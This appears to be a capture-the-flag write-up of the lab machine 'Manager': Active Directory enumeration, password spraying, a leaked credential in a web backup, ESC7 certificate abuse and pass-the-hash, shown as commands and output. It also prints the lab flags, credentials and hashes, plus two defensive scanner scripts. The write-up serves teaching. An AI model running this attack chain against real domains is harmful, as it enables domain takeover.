Proof of Concept
10.129.16.11
Nmap
PORT STATE SERVICE
53/tcp open domain
80/tcp open http
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1433/tcp open ms-sql-s
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
9389/tcp open adws
49667/tcp open unknown
49693/tcp open unknown
49694/tcp open unknown
49695/tcp open unknown
49726/tcp open unknown
49735/tcp open unknown
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap

Information Gathering
Collecting host information
┌──(kali㉿kali)-[~/Manager]
└─$ nxc smb 10.129.16.11 --generate-hosts-file hosts
SMB 10.129.16.11 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
┌──(kali㉿kali)-[~/Manager]
└─$ cat hosts
10.129.16.11 DC01.manager.htb manager.htb DC01

Applying the /etc/hosts file
┌──(kali㉿kali)-[~/Manager]
└─$ cat /etc/hosts
<SNIP>
10.129.16.11 DC01.manager.htb manager.htb DC01

Enumerating Windows users
┌──(kali㉿kali)-[~/Manager]
└─$ impacket-lookupsid manager.htb/guest@10.129.16.11 -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Brute forcing SIDs at 10.129.16.11
[*] StringBinding ncacn_np:10.129.16.11[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-4078382237-1492182817-2568127209
<SNIP>
1000: MANAGER\DC01$ (SidTypeUser)
1101: MANAGER\DnsAdmins (SidTypeAlias)
1102: MANAGER\DnsUpdateProxy (SidTypeGroup)
1103: MANAGER\SQLServer2005SQLBrowserUser$DC01 (SidTypeAlias)
1113: MANAGER\Zhong (SidTypeUser)
1114: MANAGER\Cheng (SidTypeUser)
1115: MANAGER\Ryan (SidTypeUser)
1116: MANAGER\Raven (SidTypeUser)
1117: MANAGER\JinWoo (SidTypeUser)
1118: MANAGER\ChinHae (SidTypeUser)
1119: MANAGER\Operator (SidTypeUser)

Enumerating Active Directory users
┌──(kali㉿kali)-[~/Manager]
└─$ ./kerbrute userenum /usr/share/seclists/Usernames/cirt-default-usernames.txt --dc dc01.manager.htb -d manager.htb -t 100
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 02/07/26 - Ronnie Flathers @ropnop
2026/02/07 11:32:50 > Using KDC(s):
2026/02/07 11:32:50 > dc01.manager.htb:88
2026/02/07 11:32:50 > [+] VALID USERNAME: ADMINISTRATOR@manager.htb
2026/02/07 11:32:50 > [+] VALID USERNAME: Administrator@manager.htb
2026/02/07 11:32:50 > [+] VALID USERNAME: Guest@manager.htb
2026/02/07 11:32:50 > [+] VALID USERNAME: GUEST@manager.htb
2026/02/07 11:32:51 > [+] VALID USERNAME: OPERATOR@manager.htb
2026/02/07 11:32:51 > [+] VALID USERNAME: Operator@manager.htb
2026/02/07 11:32:51 > [+] VALID USERNAME: administrator@manager.htb
2026/02/07 11:32:52 > [+] VALID USERNAME: guest@manager.htb
2026/02/07 11:32:52 > [+] VALID USERNAME: operator@manager.htb
2026/02/07 11:32:52 > Done! Tested 828 usernames (9 valid) in 2.531 seconds

Initial Access
Searching for accounts whose password is the same as the username
- operator:operator SMB authentication succeeded
┌──(kali㉿kali)-[~/Manager]
└─$ nxc smb manager.htb -u users.txt -p users.txt -t 100 --continue-on-success --no-bruteforce
SMB 10.129.16.11 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:manager.htb) (signing:True) (SMBv1:False)
SMB 10.129.16.11 445 DC01 [-] manager.htb\Administrator:Administrator STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [+] manager.htb\DnsAdmins:DnsAdmins (Guest)
SMB 10.129.16.11 445 DC01 [+] manager.htb\DnsUpdateProxy:DnsUpdateProxy (Guest)
SMB 10.129.16.11 445 DC01 [+] manager.htb\SQLServer2005SQLBrowserUser$DC01:SQLServer2005SQLBrowserUser$DC01 (Guest)
SMB 10.129.16.11 445 DC01 [-] manager.htb\Zhong:Zhong STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\Cheng:Cheng STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\Ryan:Ryan STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\Raven:Raven STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\JinWoo:JinWoo STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [-] manager.htb\ChinHae:ChinHae STATUS_LOGON_FAILURE
SMB 10.129.16.11 445 DC01 [+] manager.htb\operator:operator

MSSQL authentication succeeded with the operator account
┌──(kali㉿kali)-[~/Manager]
└─$ nxc mssql manager.htb -u operator -p operator
MSSQL 10.129.16.11 1433 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:manager.htb)
MSSQL 10.129.16.11 1433 DC01 [+] manager.htb\operator:operator

Connecting to MSSQL
┌──(kali㉿kali)-[~/Manager]
└─$ impacket-mssqlclient manager.htb/operator:operator@manager.htb -windows-auth
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (MANAGER\Operator guest@master)>

Browsing files
- Found web.config and website-backup-27-07-23-old.zip in the C:\inetpub\wwwroot directory
SQL (MANAGER\Operator guest@master)> xp_dirtree C:\inetpub\wwwroot
subdirectory depth file
------------------------------- ----- ----
about.html 1 1
contact.html 1 1
css 1 0
images 1 0
index.html 1 1
js 1 0
service.html 1 1
web.config 1 1
website-backup-27-07-23-old.zip 1 1

Downloading website-backup-27-07-23-old.zip
┌──(kali㉿kali)-[~/Manager]
└─$ wget http://manager.htb/website-backup-27-07-23-old.zip
--2026-02-07 11:55:26-- http://manager.htb/website-backup-27-07-23-old.zip
Resolving manager.htb (manager.htb)... 10.129.16.11
Connecting to manager.htb (manager.htb)|10.129.16.11|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 1045328 (1021K) [application/x-zip-compressed]
Saving to: ‘website-backup-27-07-23-old.zip’
website-backup-27-07-23-old.zip 100%[==========================================================================================>] 1021K 284KB/s in 3.6s
2026-02-07 11:55:30 (284 KB/s) - ‘website-backup-27-07-23-old.zip’ saved [1045328/1045328]

Extracting the archive
┌──(kali㉿kali)-[~/Manager/backup]
└─$ unzip website-backup-27-07-23-old.zip
Archive: website-backup-27-07-23-old.zip
inflating: .old-conf.xml
inflating: about.html
inflating: contact.html
inflating: css/bootstrap.css
inflating: css/responsive.css
inflating: css/style.css
inflating: css/style.css.map
inflating: css/style.scss
inflating: images/about-img.png
inflating: images/body_bg.jpg
extracting: images/call.png
extracting: images/call-o.png
<SNIP>

Found the raven account's credentials in the .old-conf.xml file
- raven:R4v3nBe5tD3veloP3r!123
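From the defender's side, this is the check that would have flagged the backup before anyone downloaded it. The following is an added example (my code, not part of this writeup or of any tool it uses): a scanner that walks a web root or an extracted backup and reports archives left in the web root, hidden dotfiles, and XML-style configs whose password or token elements carry a value. The directory it builds is a constructed copy of the file listing and of the .old-conf.xml contents shown below; the tag pattern, the extension sets and the temporary layout are my assumptions.

```python
import os
import re
import tempfile
import xml.etree.ElementTree as ET

# Constructed copy of the .old-conf.xml found in the website backup.
SAMPLE_CONF = """<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <server>
    <host>dc01.manager.htb</host>
    <open-port enabled="true">389</open-port>
    <secure-port enabled="false">0</secure-port>
    <search-base>dc=manager,dc=htb</search-base>
    <server-type>microsoft</server-type>
    <access-user>
      <user>raven@manager.htb</user>
      <password>R4v3nBe5tD3veloP3r!123</password>
    </access-user>
    <uid-attribute>cn</uid-attribute>
  </server>
</ldap-conf>
"""

# Constructed control file: a password element that is present but empty must not fire.
SAMPLE_CLEAN = '<?xml version="1.0"?><app><password></password><debug>false</debug></app>'

SECRET_TAG = re.compile(r"(password|passwd|pwd|secret|apikey|api_key|token)$", re.I)
CONFIG_EXT = {".xml", ".config", ".conf"}
ARCHIVE_EXT = {".zip", ".7z", ".rar", ".tar", ".gz", ".bak"}


def mask(value):
    """Keep a 3-character prefix so a finding can be traced without logging the secret itself."""
    return value[:3] + "*" * max(len(value) - 3, 0)


def scan_config(path):
    """Parse one XML-style config and report elements whose tag looks like a secret and carries a value."""
    findings = []
    try:
        root = ET.parse(path).getroot()
    except ET.ParseError:
        return findings  # not well-formed XML; a fuller scanner would fall back to regex matching
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]  # drop any XML namespace
        text = (elem.text or "").strip()
        if SECRET_TAG.search(tag) and text:
            findings.append({"file": path, "kind": "plaintext-secret", "tag": tag, "value": mask(text)})
    return findings


def scan_tree(root_dir):
    """Walk a web root or extracted backup: archives left behind, dotfiles, and configs with embedded secrets."""
    findings = []
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            path = os.path.join(dirpath, name)
            ext = os.path.splitext(name)[1].lower()
            if ext in ARCHIVE_EXT:
                findings.append({"file": path, "kind": "exposed-archive"})
            if name.startswith("."):
                findings.append({"file": path, "kind": "hidden-file"})
            if ext in CONFIG_EXT:
                findings.extend(scan_config(path))
    return findings


def demo():
    """Build a constructed web root mirroring the listing in this writeup and scan it; paths are made relative."""
    layout = {
        ".old-conf.xml": SAMPLE_CONF,
        "web.config": SAMPLE_CLEAN,
        "about.html": "<html></html>",
        "website-backup-27-07-23-old.zip": "",  # empty placeholder; only the name matters for this check
    }
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in layout.items():
            with open(os.path.join(tmp, name), "w", encoding="utf-8") as fh:
                fh.write(body)
        return [dict(f, file=os.path.relpath(f["file"], tmp)) for f in scan_tree(tmp)]


if __name__ == "__main__":
    for finding in demo():
        print(finding)
```

Run it as-is and it reports the archive, the dotfile, and a masked `password` hit in `.old-conf.xml` while staying silent on the empty element in `web.config`. Pointed at a real `C:\inetpub\wwwroot` (or at any directory a deployment pipeline publishes), the same three checks catch the two root causes on this box: a backup archive served by IIS, and a service account password committed inside it.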
┌──(kali㉿kali)-[~/Manager/backup]
└─$ cat .old-conf.xml
<?xml version="1.0" encoding="UTF-8"?>
<ldap-conf xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<server>
<host>dc01.manager.htb</host>
<open-port enabled="true">389</open-port>
<secure-port enabled="false">0</secure-port>
<search-base>dc=manager,dc=htb</search-base>
<server-type>microsoft</server-type>
<access-user>
<user>raven@manager.htb</user>
<password>R4v3nBe5tD3veloP3r!123</password>
</access-user>
<uid-attribute>cn</uid-attribute>
</server>
<search type="full">
<dir-list>
<dir>cn=Operator1,CN=users,dc=manager,dc=htb</dir>
</dir-list>
</search>
</ldap-conf>

Connecting via WinRM as raven
┌──(kali㉿kali)-[~/Manager/backup]
└─$ evil-winrm -i manager.htb -u 'raven' -p 'R4v3nBe5tD3veloP3r!123'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Raven\Documents>

Reading user.txt
*Evil-WinRM* PS C:\Users\Raven\Desktop> type user.txt
4ea57750094b540eb832bc54efa99196
*Evil-WinRM* PS C:\Users\Raven\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.16.11
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1

Privilege Escalation
Scanning for vulnerabilities with certipy
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad find -u raven -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.16.11 -target-ip 10.129.16.11 -vulnerable
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 33 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 11 enabled certificate templates
[*] Finding issuance policies
[*] Found 13 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'manager-DC01-CA' via RRP
[*] Successfully retrieved CA configuration for 'manager-DC01-CA'
[*] Checking web enrollment for CA 'manager-DC01-CA' @ 'dc01.manager.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260207120513_Certipy.txt'
[*] Wrote text output to '20260207120513_Certipy.txt'
[*] Saving JSON output to '20260207120513_Certipy.json'
[*] Wrote JSON output to '20260207120513_Certipy.json'

ESC7 vulnerability found
┌──(kali㉿kali)-[~/Manager]
└─$ cat 20260207120513_Certipy.txt
Certificate Authorities
  0
    CA Name                             : manager-DC01-CA
    DNS Name                            : dc01.manager.htb
    Certificate Subject                 : CN=manager-DC01-CA, DC=manager, DC=htb
    Certificate Serial Number           : 5150CE6EC048749448C7390A52F264BB
    Certificate Validity Start          : 2023-07-27 10:21:05+00:00
    Certificate Validity End            : 2122-07-27 10:31:04+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : MANAGER.HTB\Administrators
      Access Rights
        Enroll                          : MANAGER.HTB\Operator
                                          MANAGER.HTB\Authenticated Users
                                          MANAGER.HTB\Raven
        ManageCa                        : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
                                          MANAGER.HTB\Raven
        ManageCertificates              : MANAGER.HTB\Administrators
                                          MANAGER.HTB\Domain Admins
                                          MANAGER.HTB\Enterprise Admins
    [+] User Enrollable Principals      : MANAGER.HTB\Raven
                                          MANAGER.HTB\Authenticated Users
    [+] User ACL Principals             : MANAGER.HTB\Raven
    [!] Vulnerabilities
      ESC7                              : User has dangerous permissions.
Certificate Templates                   : [!] Could not find any certificate templates

Adding the Certificate Officer role to the Raven account
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.129.16.11' -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -add-officer 'raven'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Successfully added officer 'Raven' on 'manager-DC01-CA'

Enabling the SubCA template on the CA so that it can be used
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns '10.129.16.11' -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -enable-template 'SubCA'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Successfully enabled 'SubCA' on 'manager-DC01-CA'

Requesting a SubCA template certificate for the Administrator account, producing Request ID 22 and a private key
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip 10.129.16.11 -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -template 'SubCA' -upn 'administrator@manager.htb' -sid 'S-1-5-21-4078382237-1492182817-2568127209-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 22
[-] Got error while requesting certificate: code: 0x80094012 - CERTSRV_E_TEMPLATE_DENIED - The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Would you like to save the private key? (y/N): y
[*] Saving private key to '22.key'
[*] Wrote private key to '22.key'
[-] Failed to request certificate

Using Raven's ManageCa and Officer rights to force approval of the pending Request ID 22
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad ca -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -ns 10.129.16.11 -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -issue-request '22' -dc-ip 10.129.16.11
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Successfully issued certificate request ID 22

Creating administrator.pfx from the approved Request ID 22 certificate and the private key
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad req -u 'raven@manager.htb' -p 'R4v3nBe5tD3veloP3r!123' -dc-ip '10.129.16.11' -target 'DC01.manager.htb' -ca 'manager-DC01-CA' -retrieve '22'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Retrieving certificate with ID 22
[*] Successfully retrieved certificate
[*] Got certificate with UPN 'administrator@manager.htb'
[*] Certificate object SID is 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Loaded private key from '22.key'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

Using the PFX certificate to obtain a Kerberos TGT and dump the Administrator's NT hash
┌──(kali㉿kali)-[~/Manager]
└─$ certipy-ad auth -pfx 'administrator.pfx' -username 'administrator' -domain 'manager.htb' -dc-ip '10.129.16.11'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@manager.htb'
[*] SAN URL SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Security Extension SID: 'S-1-5-21-4078382237-1492182817-2568127209-500'
[*] Using principal: 'administrator@manager.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@manager.htb': aad3b435b51404eeaad3b435b51404ee:ae5064c2f62317332c88629e025924ef

Logged in as Administrator over WinRM with the extracted NT hash
┌──(kali㉿kali)-[~/Manager]
└─$ evil-winrm -i 10.129.16.11 -u 'administrator' -H 'ae5064c2f62317332c88629e025924ef'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>

Reading root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
686b06aa26f1a32abdd7f04c0a876e31
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0 2:
Connection-specific DNS Suffix . : .htb
IPv4 Address. . . . . . . . . . . : 10.129.16.11
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : 10.129.0.1
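The whole privilege escalation chain above hinges on one line of the Certipy report: a regular user, Raven, holds ManageCa on the CA. As an added defender-side example (my code, not the writeup's and not part of Certipy), the block below parses the `Access Rights` block of a Certipy text report and flags ESC7, that is, any principal outside the expected CA administrator groups holding ManageCa or ManageCertificates. CERTIPY_REPORT is a constructed excerpt of the report shown earlier; TRUSTED_CA_ADMINS is an assumed baseline for this domain and should be set to whatever the CA's change records say it ought to be.

```python
import re

# Constructed excerpt of the Certipy text report for 'manager-DC01-CA' shown earlier in this writeup.
CERTIPY_REPORT = """\
Certificate Authorities
  0
    CA Name                         : manager-DC01-CA
    DNS Name                        : dc01.manager.htb
    Request Disposition             : Issue
    Permissions
      Owner                         : MANAGER.HTB\\Administrators
      Access Rights
        Enroll                      : MANAGER.HTB\\Operator
                                      MANAGER.HTB\\Authenticated Users
                                      MANAGER.HTB\\Raven
        ManageCa                    : MANAGER.HTB\\Administrators
                                      MANAGER.HTB\\Domain Admins
                                      MANAGER.HTB\\Enterprise Admins
                                      MANAGER.HTB\\Raven
        ManageCertificates          : MANAGER.HTB\\Administrators
                                      MANAGER.HTB\\Domain Admins
                                      MANAGER.HTB\\Enterprise Admins
    [+] User Enrollable Principals  : MANAGER.HTB\\Raven
"""

# Assumed baseline: the only principals that should ever manage this CA or approve its requests.
TRUSTED_CA_ADMINS = {"administrators", "domain admins", "enterprise admins"}

# ManageCa lets a principal change CA settings (including adding officers and enabling templates);
# ManageCertificates (the officer right) lets a principal issue pending or denied requests.
DANGEROUS_RIGHTS = ("ManageCa", "ManageCertificates")

# "        Enroll                      : MANAGER.HTB\Operator" -> ("Enroll", "MANAGER.HTB\Operator")
RIGHT_LINE = re.compile(r"^\s*([A-Za-z]+)\s*:\s*(\S.*?)\s*$")


def parse_access_rights(report):
    """Return {right: [principals]} from the 'Access Rights' block of a Certipy text report."""
    rights, current, in_block = {}, None, False
    for line in report.splitlines():
        stripped = line.strip()
        if stripped == "Access Rights":
            in_block = True
            continue
        if not in_block:
            continue
        if not stripped or stripped.startswith("["):
            break  # first '[+]'/'[!]' line (or blank) ends the block
        m = RIGHT_LINE.match(line)
        if m:
            current = m.group(1)
            rights.setdefault(current, []).append(m.group(2))
        elif current:
            rights[current].append(stripped)  # continuation line: one more principal for the same right
    return rights


def account_name(principal):
    """'MANAGER.HTB\\Raven' -> 'raven', so comparisons ignore the domain prefix and case."""
    return principal.split("\\", 1)[-1].strip().lower()


def find_esc7(rights, trusted=TRUSTED_CA_ADMINS):
    """List (right, principal) pairs where a principal outside the trusted set can manage the CA."""
    hits = []
    for right in DANGEROUS_RIGHTS:
        for principal in rights.get(right, []):
            if account_name(principal) not in trusted:
                hits.append((right, principal))
    return hits


def audit(report=CERTIPY_REPORT):
    """Parse a report and return its ESC7 findings; empty list means the CA ACL matches the baseline."""
    return find_esc7(parse_access_rights(report))


if __name__ == "__main__":
    for right, who in audit():
        print(f"ESC7: {who} holds {right} on the CA")
```

Certipy's `-vulnerable` mode already prints the ESC7 line, so the point of a parser like this is not discovery but repeatability: the same report can be produced on a schedule, checked against an explicit trusted set, and diffed over time, so that a ManageCa grant to a developer account shows up as a change rather than as something found years later during a pentest. On this CA the remediation is simply to remove ManageCa from Raven and re-run the report until `audit()` returns an empty list.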